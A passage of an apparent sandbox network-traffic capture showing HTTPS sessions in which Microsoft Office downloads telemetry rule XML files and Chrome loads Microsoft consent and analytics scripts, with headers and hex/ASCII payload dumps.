                                                                                                                                                                        2024-11-21 09:38:03 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        117192.168.2.64984413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:03 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:04 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                        x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093804Z-1777c6cb754j47wfhC1TEB5wrw00000006ng00000000f02c
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:04 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        118192.168.2.64984513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:04 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:04 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                        x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093804Z-178bfbc474bbcwv4hC1NYCypys000000010g00000000ezvu
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:04 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        119192.168.2.64984613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:04 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:05 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                        x-ms-request-id: 5a6b30d1-101e-00a2-7c5b-3b9f2e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093805Z-178bfbc474b9xljthC1NYCtw94000000012g00000000g0tn
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:05 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        120192.168.2.64984713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:05 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:05 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                        x-ms-request-id: 4b825c62-901e-008f-3f5c-3b67a6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093805Z-178bfbc474bpnd5vhC1NYC4vr40000000190000000006uw4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:05 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        121192.168.2.649852184.28.90.27443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:05 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                        2024-11-21 09:38:05 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                        Server: ECAcc (lpl/EF06)
                                                                                                                                                                        X-CID: 11
                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                        Cache-Control: public, max-age=198405
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:05 GMT
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-CID: 2
                                                                                                                                                                        2024-11-21 09:38:05 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        122192.168.2.64984813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:05 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:05 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                        x-ms-request-id: 2620e4ad-c01e-008d-6675-3b2eec000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093805Z-1777c6cb7542p5p4hC1TEBq0980000000b00000000000ur1
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:05 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        123192.168.2.64985313.107.246.454433392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:05 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-21 09:38:06 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:06 GMT
                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Age: 9152
                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                        x-ms-request-id: 09b6fa6f-101e-0038-42e3-3b8981000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-azure-ref: 20241121T093806Z-178bfbc474bwh9gmhC1NYCy3rs000000019g00000000b8wr
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:06 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                                                                                                        Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                                                                                                        2024-11-21 09:38:06 UTC82INData Raw: 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                        Data Ascii: r"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 66 6f 63 75 73 3a 3a 62 65 66 6f 72 65 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 2d
                                                                                                                                                                        Data Ascii: abel:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:focus::before {\n border: 1px solid "+e["radio-button-hover-border-
                                                                                                                                                                        2024-11-21 09:38:06 UTC4195INData Raw: 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 29 3a 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 74 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 63 61 6c 6c 28 65 29 7d 29 29 7d 2c 65 2e 63 6f 6f 6b 69 65 4e 61 6d 65 3d 22 4d 53 43 43 22 2c 65 2e
                                                                                                                                                                        Data Ascii: length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEventListener(t,o):e.attachEvent("on"+t,(function(){o.call(e)}))},e.cookieName="MSCC",e.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        124192.168.2.64985413.107.246.454433392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:05 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-21 09:38:06 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:06 GMT
                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
